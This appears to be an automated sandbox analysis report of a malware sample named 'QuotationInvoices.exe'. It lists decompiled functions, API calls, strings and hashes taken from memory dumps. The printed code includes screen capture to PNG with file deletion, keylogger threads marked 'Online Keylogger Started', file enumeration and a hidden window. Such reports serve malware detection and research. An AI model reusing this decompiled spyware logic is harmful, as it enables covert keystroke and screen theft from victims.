0x0041b4a4
0x0041b4dd
0x0041b4dd
0x0041b4e0
0x00000000
0x0041b4e0
0x0041b4a6
0x0041b4ab
0x0041b4ad
0x0041b4b4
0x0041b4b9
0x0041b4be
0x00000000
0x00000000
0x0041b4c8
0x0041b4cd
0x0041b4d2
0x00000000
0x00000000
0x0041b4d4
0x0041b4d5
0x0041b4db
0x00000000
0x00000000
0x00000000
0x0041b4db
0x0041b51b
0x0041b524
0x00000000
0x00000000
0x0041b526
0x0041b529
0x0041b532
0x0041b53c
0x0041b543
0x0041b549
0x0041b54e
0x0041b58b
0x0041b58b
0x0041b592
0x0041b594
0x0041b595
0x00000000
0x0041b595
0x0041b552
0x0041b562
0x0041b566
0x0041b57c
0x0041b580
0x0041b582
0x0041b582
0x00000000
0x0041b580
0x0041b571
0x0041b577
0x0041b57a
0x00000000
0x00000000
0x00000000
0x0041b57a
0x0041b554
0x0041b55c
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b55c
0x0041b46f
0x0041b471
0x0041b474
0x0041b474
0x0041b476
0x0041b477
0x0041b47b
0x00000000
0x0041b47b
0x0041b468
0x00000000
0x0041b468
0x0041b44d
0x0041b44f
0x0041b452
0x0041b452
0x0041b454
0x0041b455
0x0041b459
0x00000000
0x0041b4e3
0x0041b4e5
0x0041b4e6
0x0041b4f0
0x0041b4f8
0x0041b4fc
0x0041b505
0x0041b50c
0x0041b511
0x00000000

APIs

_strncpy.LIBCMT ref: 0041B489

Strings

ALL, xrefs: 0041B40A
TLS_AES_128_GCM_SHA256, xrefs: 0041B3FB, 0041B40F, 0041B427, 0041B43D, 0041B483, 0041B487
DEFAULT, xrefs: 0041B422
ECDSA, xrefs: 0041B56B

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strncpy
String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
API String ID: 2961919466-1012175531
Opcode ID: ec7190f5a1a75598cfb2293c4edae61362d3e7fe784b395e8f1218043abf5992
Instruction ID: d2b42f96f0ab6fa3f2a7bf685ccbc62d8a3202af80f1d5709f87f86ac7033238
Opcode Fuzzy Hash: ec7190f5a1a75598cfb2293c4edae61362d3e7fe784b395e8f1218043abf5992
Instruction Fuzzy Hash: 07510871D04215AADF208FA488817FEBB69DB44318F14846FEC85E7342E7798A8687D9

Uniqueness

Uniqueness Score: -1.00%

Function 00445049, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00445049(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
				intOrPtr _t194;
				signed int _t196;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t202;
				union _FINDEX_INFO_LEVELS _t203;
				signed int _t208;
				signed int _t210;
				signed int _t211;
				void* _t213;
				intOrPtr _t214;
				void* _t215;
				signed int _t219;
				void* _t221;
				signed int _t222;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				void* _t227;
				void* _t228;

				_t80 = _a8;
				_t224 = _t223 - 0x20;
				if(_t80 != 0) {
					_t208 = _a4;
					_t160 = 0;
					 *_t80 = 0;
					_t199 = 0;
					_t151 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t208;
					if( *_t208 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t151 - _t199;
						_v8 = _t160;
						_t191 = (_t82 >> 2) + 1;
						__eflags = _t151 - _t199;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t210;
						if(_t210 != 0) {
							_t197 = _t199;
							_t158 = _t160;
							do {
								_t184 =  *_t197;
								_t17 = _t184 + 1; // 0x1
								_v8 = _t17;
								do {
									_t143 =  *_t184;
									_t184 = _t184 + 1;
									__eflags = _t143;
								} while (_t143 != 0);
								_t158 = _t158 + 1 + _t184 - _v8;
								_t197 = _t197 + 4;
								_t145 = _v12 + 1;
								_v12 = _t145;
								__eflags = _t145 - _t210;
							} while (_t145 != _t210);
							_t191 = _v16;
							_v8 = _t158;
							_t151 = _v336.cAlternateFileName;
						}
						_t211 = L0043B8FE(_t191, _v8, 1);
						_t225 = _t224 + 0xc;
						__eflags = _t211;
						if(_t211 != 0) {
							_t87 = _t211 + _v16 * 4;
							_v20 = _t87;
							_t192 = _t87;
							_v16 = _t87;
							__eflags = _t199 - _t151;
							if(_t199 == _t151) {
								L23:
								_t200 = 0;
								__eflags = 0;
								 *_a8 = _t211;
								goto L24;
							} else {
								_t93 = _t211 - _t199;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t163 =  *_t199;
									_v12 = _t163 + 1;
									do {
										_t95 =  *_t163;
										_t163 = _t163 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t164 = _t163 - _v12;
									_t35 = _t164 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = L0044BF69(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
									_t225 = _t225 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E0043603A();
										asm("int3");
										_t221 = _t225;
										_push(_t164);
										_t165 = _v64;
										_t47 = _t165 + 1; // 0x1
										_t193 = _t47;
										do {
											_t103 =  *_t165;
											_t165 = _t165 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t199);
										_t202 = _a8;
										_t167 = _t165 - _t193 + 1;
										_v12 = _t167;
										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
											_push(_t151);
											_t50 = _t202 + 1; // 0x1
											_t154 = _t50 + _t167;
											_t213 = E0043DAF9(_t167, _t154, 1);
											_t169 = _t211;
											__eflags = _t202;
											if(_t202 == 0) {
												L34:
												_push(_v12);
												_t154 = _t154 - _t202;
												_t108 = L0044BF69(_t169, _t213 + _t202, _t154, _v0);
												_t226 = _t225 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t137 = E00445418(_a12, __eflags, _t213);
													L0043E9A5(0);
													_t139 = _t137;
													goto L36;
												}
											} else {
												_push(_t202);
												_t140 = L0044BF69(_t169, _t213, _t154, _a4);
												_t226 = _t225 + 0x10;
												__eflags = _t140;
												if(_t140 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E0043603A();
													asm("int3");
													_push(_t221);
													_t222 = _t226;
													_t227 = _t226 - 0x150;
													_t111 =  *0x46900c; // 0x7c295e5c
													_v116 = _t111 ^ _t222;
													_t170 = _v100;
													_push(_t154);
													_t155 = _v104;
													_push(_t213);
													_t214 = _v96;
													_push(_t202);
													_v440 = _t214;
													while(1) {
														__eflags = _t170 - _t155;
														if(_t170 == _t155) {
															break;
														}
														_t113 =  *_t170;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t170 = L0044E860(_t155, _t170);
																	continue;
																}
															}
														}
														break;
													}
													_t194 =  *_t170;
													__eflags = _t194 - 0x3a;
													if(_t194 != 0x3a) {
														L47:
														_t203 = 0;
														__eflags = _t194 - 0x2f;
														if(_t194 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t194 - 0x5c;
															if(_t194 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t194 - 0x3a;
																if(_t194 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														L004315B0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E0044E480(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00445031);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E0042F3BB(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							L0043E9A5(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = L0044E820( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E004453F3( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = L00439BAF();
					_t219 = 0x16;
					 *_t148 = _t219;
					E0043600D();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x0044504e
0x00445051
0x00445057
0x0044506f
0x00445072
0x00445076
0x00445078
0x0044507a
0x0044507c
0x0044507f
0x00445082
0x00445085
0x00445087
0x004450df
0x004450df
0x004450e5
0x004450e7
0x004450f2
0x004450f6
0x004450f8
0x004450fb
0x004450ff
0x004450ff
0x00445101
0x00445103
0x00445105
0x00445107
0x00445107
0x00445109
0x0044510c
0x0044510f
0x0044510f
0x00445111
0x00445112
0x00445112
0x0044511d
0x0044511f
0x00445122
0x00445123
0x00445126
0x00445126
0x0044512a
0x0044512d
0x00445130
0x00445130
0x0044513e
0x00445140
0x00445143
0x00445145
0x0044514f
0x00445152
0x00445155
0x00445157
0x0044515a
0x0044515c
0x004451ac
0x004451af
0x004451af
0x004451b1
0x00000000
0x0044515e
0x00445160
0x00445160
0x00445162
0x00445165
0x00445165
0x0044516a
0x0044516d
0x0044516d
0x0044516f
0x00445170
0x00445170
0x00445174
0x00445177
0x00445177
0x0044517a
0x0044517d
0x0044518a
0x0044518f
0x00445192
0x00445194
0x004451ce
0x004451cf
0x004451d0
0x004451d1
0x004451d2
0x004451d3
0x004451d8
0x004451dc
0x004451de
0x004451df
0x004451e2
0x004451e2
0x004451e5
0x004451e5
0x004451e7
0x004451e8
0x004451e8
0x004451f1
0x004451f2
0x004451f5
0x004451f8
0x004451fb
0x004451fd
0x00445204
0x00445206
0x00445209
0x00445213
0x00445216
0x00445217
0x00445219
0x0044522d
0x0044522d
0x00445230
0x0044523a
0x0044523f
0x00445242
0x00445244
0x00000000
0x00445246
0x0044524a
0x00445253
0x00445259
0x00000000
0x0044525c
0x0044521b
0x0044521b
0x00445221
0x00445226
0x00445229
0x0044522b
0x00445262
0x00445264
0x00445265
0x00445266
0x00445267
0x00445268
0x00445269
0x0044526e
0x00445271
0x00445272
0x00445274
0x0044527a
0x00445281
0x00445284
0x00445287
0x00445288
0x0044528b
0x0044528c
0x0044528f
0x00445290
0x004452b1
0x004452b1
0x004452b3
0x00000000
0x00000000
0x00445298
0x0044529a
0x0044529c
0x0044529e
0x004452a0
0x004452a2
0x004452a4
0x004452af
0x00000000
0x004452af
0x004452a4
0x004452a0
0x00000000
0x0044529c
0x004452b5
0x004452b7
0x004452ba
0x004452d3
0x004452d3
0x004452d5
0x004452d8
0x004452e8
0x004452ea
0x004452ea
0x004452da
0x004452da
0x004452dd
0x00000000
0x004452df
0x004452df
0x004452e2
0x00000000
0x004452e4
0x004452e4
0x004452e4
0x004452e2
0x004452dd
0x004452f8
0x004452fc
0x0044530a
0x0044530f
0x00445324
0x00445326
0x0044532c
0x0044532f
0x00445361
0x00445361
0x00445366
0x0044536c
0x0044536c
0x00445373
0x0044538d
0x0044538d
0x0044538e
0x00445394
0x0044539a
0x0044539b
0x0044539c
0x004453a1
0x004453a4
0x004453a6
0x00000000
0x00000000
0x00000000
0x00000000
0x00445375
0x00445375
0x0044537b
0x0044537d
0x00000000
0x0044537f
0x0044537f
0x00445382
0x00000000
0x00445384
0x00445384
0x0044538b
0x00000000
0x00000000
0x00000000
0x00000000
0x0044538b
0x00445382
0x0044537d
0x00000000
0x004453a8
0x004453b0
0x004453b6
0x004453b8
0x004453b8
0x004453c0
0x004453c5
0x004453cd
0x004453d0
0x004453d2
0x004453e6
0x004453eb
0x00445331
0x00445331
0x00445332
0x00445333
0x00445334
0x00445335
0x0044533d
0x0044533d
0x0044533d
0x0044533f
0x00445342
0x00445345
0x00445345
0x004452bc
0x004452bf
0x004452c1
0x00000000
0x004452c3
0x004452c3
0x004452c6
0x004452c7
0x004452c8
0x004452c9
0x004452ce
0x004452c1
0x0044534d
0x00445352
0x0044535d
0x00000000
0x00000000
0x00000000
0x0044522b
0x004451ff
0x00445201
0x0044525d
0x00445261
0x00445261
0x00000000
0x00000000
0x00000000
0x00000000
0x00445196
0x00445199
0x0044519c
0x0044519f
0x004451a2
0x004451a5
0x004451a8
0x004451a8
0x00000000
0x00445165
0x00445147
0x00445147
0x004451b3
0x004451b5
0x00000000
0x004451ba
0x00445089
0x00445089
0x0044508c
0x00445095
0x00445098
0x0044509f
0x004450a1
0x004450ba
0x004450bb
0x004450bc
0x004450be
0x004450c3
0x004450a3
0x004450a3
0x004450a6
0x004450a7
0x004450a9
0x004450ab
0x004450ad
0x004450b2
0x004450b2
0x004450c6
0x004450c8
0x004450ca
0x00000000
0x00000000
0x004450d0
0x004450d3
0x004450d5
0x004450d7
0x00000000
0x004450d9
0x004450d9
0x004450dc
0x00000000
0x004450dc
0x00000000
0x004450d7
0x004451bb
0x004451be
0x004451c3
0x00000000
0x004451c6
0x00445059
0x00445059
0x00445060
0x00445061
0x00445063
0x00445068
0x004451c7
0x004451cb
0x004451cb
0x00000000

APIs

_strpbrk.LIBCMT ref: 00445098
_free.LIBCMT ref: 004451B5

Part of subcall function 0043603A: IsProcessorFeaturePresent.KERNEL32(00000017,0043600C,00000000,00000000,?,0046B4F8,0040D2D6,00000000,?,?,0043602C,00000000,00000000,00000000,00000000,00000000), ref: 0043603C
Part of subcall function 0043603A: GetCurrentProcess.KERNEL32(C0000417), ref: 0043605E
Part of subcall function 0043603A: TerminateProcess.KERNEL32(00000000), ref: 00436065

Strings

., xrefs: 0044536C
*?, xrefs: 0044508C
\^)|/, xrefs: 0044527A

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.$\^)|/
API String ID: 2812119850-4245205430
Opcode ID: 65070de0092b1563928b6102289e9b90a5f15048003587581a903bd1cac9d50a
Instruction ID: afa9a98c5a3b5f8c0502d1c9ba3f75b95f28588383d31a526478e7ff6b05d1ac
Opcode Fuzzy Hash: 65070de0092b1563928b6102289e9b90a5f15048003587581a903bd1cac9d50a
Instruction Fuzzy Hash: E751C375E00609AFEF14CFA9C881AAEB7B5FF58314F24816EE854E7301D6799E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 004151E7, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 124
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004151E7(void* __ecx, void* __edx, void* __eflags) {
				char _v1044;
				char _v1052;
				char _v1088;
				void* _v1092;
				char _v1112;
				char _v1116;
				char _v1120;
				void* _v1132;
				char _v1144;
				char _v1148;
				char _v1152;
				char _v1156;
				void* _v1160;
				char _v1180;
				char _v1184;
				char _v1196;
				char _v1200;
				char _v1220;
				char _v1228;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t38;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t64;
				void* _t70;
				char* _t81;
				char* _t83;
				void* _t117;
				void* _t120;
				void* _t121;
				signed int _t124;
				void* _t126;

				_t129 = __eflags;
				_t126 = (_t124 & 0xfffffff8) - 0x4b4;
				_t121 = __ecx;
				_t71 = __edx;
				L00402F9A(__edx,  &_v1184, E0040412C(__edx,  &_v1156, __ecx), _t117, __eflags, L"png");
				L00401E54();
				E0041437F( &_v1120, __edx, __eflags, 0);
				_t81 =  &_v1120;
				_t38 =  *0x46ad10(L00401EF9(_t81), E004023D3(), _t117, _t120, _t70);
				_push(_t81);
				L00413E93( &_v1144, _t38);
				_t83 = L"image/png";
				L004146EB(_t83,  &_v1112);
				_push(_t83);
				L00413F0B(L00401E4F( &_v1200),  &_v1152, _t42,  &_v1112);
				if( *((char*)(L00401EF9(L00401DAD(0x46b558,  &_v1112, _t129, 0x1b)))) == 1) {
					E0040201F(__edx,  &_v1220);
					_t51 = E0041735B(L00401E4F( &_v1196),  &_v1220);
					_t131 = _t51;
					if(_t51 != 0) {
						DeleteFileW(L00401E4F( &_v1196));
						_t54 = E004023D3();
						L00405939( &_v1044, L00401EF9(0x46b540), _t54);
						_t57 = E004023D3();
						L00405A61(_t71,  &_v1052,  &_v1220,  &_v1180, L00401EF9( &_v1228), _t57);
						L00402F9A(_t71,  &_v1116, E0040412C(_t71,  &_v1088, _t121), 0x46b540, _t131, L"dat");
						L00401E54();
						_t64 = L00401E4F( &_v1116);
						E00402036(_t71, _t126 - 0x18, _t61, _t131,  &_v1196);
						E004173CD(_t64);
						L00401E54();
						L00401F11();
					}
					_t45 = L00401F11();
				}
				L00413EB9(_t45,  &_v1148);
				L00401F11();
				return L00401E54();
			}

0x004151e7
0x004151ed
0x004151f6
0x004151f8
0x0041520f
0x00415219
0x00415226
0x00415236
0x00415240
0x00415246
0x0041524c
0x00415258
0x0041525d
0x00415262
0x00415279
0x00415294
0x0041529e
0x004152b2
0x004152b7
0x004152b9
0x004152c9
0x004152d6
0x004152eb
0x004152f4
0x00415310
0x00415330
0x0041533d
0x00415349
0x0041535a
0x00415361
0x00415370
0x00415379
0x00415379
0x00415382
0x00415382
0x0041538b
0x00415394
0x004153a8

APIs

Part of subcall function 0041437F: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0041439A
Part of subcall function 0041437F: CreateCompatibleDC.GDI32(00000000), ref: 004143A6

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 00415240

Part of subcall function 00413E93: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00413EA9

Part of subcall function 00413F0B: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 00413F1C

Part of subcall function 0041735B: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408766), ref: 00417378

DeleteFileW.KERNEL32(00000000,0000001B), ref: 004152C9

Strings

png, xrefs: 004151FA
dat, xrefs: 00415315
image/png, xrefs: 00415258

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: 78a8e4e1371f873b1923b8eb783634d74ce3f63069e616a0fb1e86dc84e71fd4
Instruction ID: f3662fe6dcbd6b61bc531316db6b178abe596d07cde31459e1410ab43fe52af1
Opcode Fuzzy Hash: 78a8e4e1371f873b1923b8eb783634d74ce3f63069e616a0fb1e86dc84e71fd4
Instruction Fuzzy Hash: 17412D711083405AC715FB21D856AEF73A9AFD0358F00093FF996631E2EF785A48CA9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043B665, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QuotationInvoices.exe,00000104), ref: 0043B6A5
_free.LIBCMT ref: 0043B770
_free.LIBCMT ref: 0043B77A

Strings

C:\Users\user\Desktop\QuotationInvoices.exe, xrefs: 0043B69C, 0043B6A3, 0043B6D2, 0043B70A
`OI, xrefs: 0043B726, 0043B769

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\QuotationInvoices.exe$`OI
API String ID: 2506810119-146768237
Opcode ID: 89ae31847dad3a89b7c7024778b6d3ddc50e6e20251e1e867decd4e7443b360e
Instruction ID: 7eb7844837c9a88e52287c12c4c3ad2ed5daa89c47cbfe610cf04511596b491d
Opcode Fuzzy Hash: 89ae31847dad3a89b7c7024778b6d3ddc50e6e20251e1e867decd4e7443b360e
Instruction Fuzzy Hash: CF319671A00608AFDB21DF95DD81A9EBBB8EF89310F10506BE904D7311D7B45A41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408BBE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00408DFF: GetLocalTime.KERNEL32(?,?,00000000), ref: 00408E0D
Part of subcall function 00408DFF: SetEvent.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00408EB3

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

CreateThread.KERNEL32(00000000,00000000,Function_0000832B,?,00000000,00000000), ref: 00408C40

Part of subcall function 004081EF: GetKeyboardLayout.USER32 ref: 004081F4

CreateThread.KERNEL32(00000000,00000000,Function_000082F2,?,00000000,00000000), ref: 00408C28
CreateThread.KERNEL32(00000000,00000000,Function_0000831C,?,00000000,00000000), ref: 00408C34

Strings

[Info], xrefs: 00408BF4
Online Keylogger Started, xrefs: 00408BD2, 00408BD7, 00408BE9

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateThread$LocalTime$EventKeyboardLayout
String ID: Online Keylogger Started$[Info]
API String ID: 1855134701-3401407043
Opcode ID: 6fafc3fef17ffe0f4314abf9909b7c5eda3346b5325bf6f6c055c49a34b4cbac
Instruction ID: b1ad4234dd8dfe989f56dad516cf648b555e6b7257d35a868572606019df9e75
Opcode Fuzzy Hash: 6fafc3fef17ffe0f4314abf9909b7c5eda3346b5325bf6f6c055c49a34b4cbac
Instruction Fuzzy Hash: 39018FA07012593AE52432360E86E7F2D6DCB92798B40047FF481361C3DE7D5D4592BE

Uniqueness

Uniqueness Score: -1.00%

Function 00418498, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00418498() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				L004315B0(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = 0x418518;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}

0x004184aa
0x004184b4
0x004184be
0x004184c4
0x004184ce
0x004184d1
0x004184d2
0x004184d9
0x004184dc
0x004184dd
0x004184e0
0x004184e1
0x004184e3
0x004184ed
0x0041850f
0x00000000
0x0041850f
0x004184ff
0x00418507
0x00418509
0x00000000
0x00418509
0x00418517

APIs

RegisterClassExA.USER32(00000030), ref: 004184E4
CreateWindowExA.USER32 ref: 004184FF
GetLastError.KERNEL32 ref: 00418509

Strings

0, xrefs: 004184B4
MsgWindowClass, xrefs: 004184AF

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: c4cfb0958f1c35439050f27203d124e8cdc186e97d2b25d9f9dbd29a0c079685
Instruction ID: 1d6e2a8626bed92c304841ad555c31eaa9abbc4aef0032c10e60f8620c6b66e7
Opcode Fuzzy Hash: c4cfb0958f1c35439050f27203d124e8cdc186e97d2b25d9f9dbd29a0c079685
Instruction Fuzzy Hash: 730125B1900219ABDB00DFE59C849EFBBBCFB05355B00052AF900A2240EB748A048AA4

Uniqueness

Uniqueness Score: -1.00%

Function 004323C1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E004323C1(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_t5 =  &_a4; // 0x4327ed
					_push( *_t5);
					L00432A10(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_t7 =  &_a4; // 0x4327ed
				_push( *_t7);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				L0043199B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
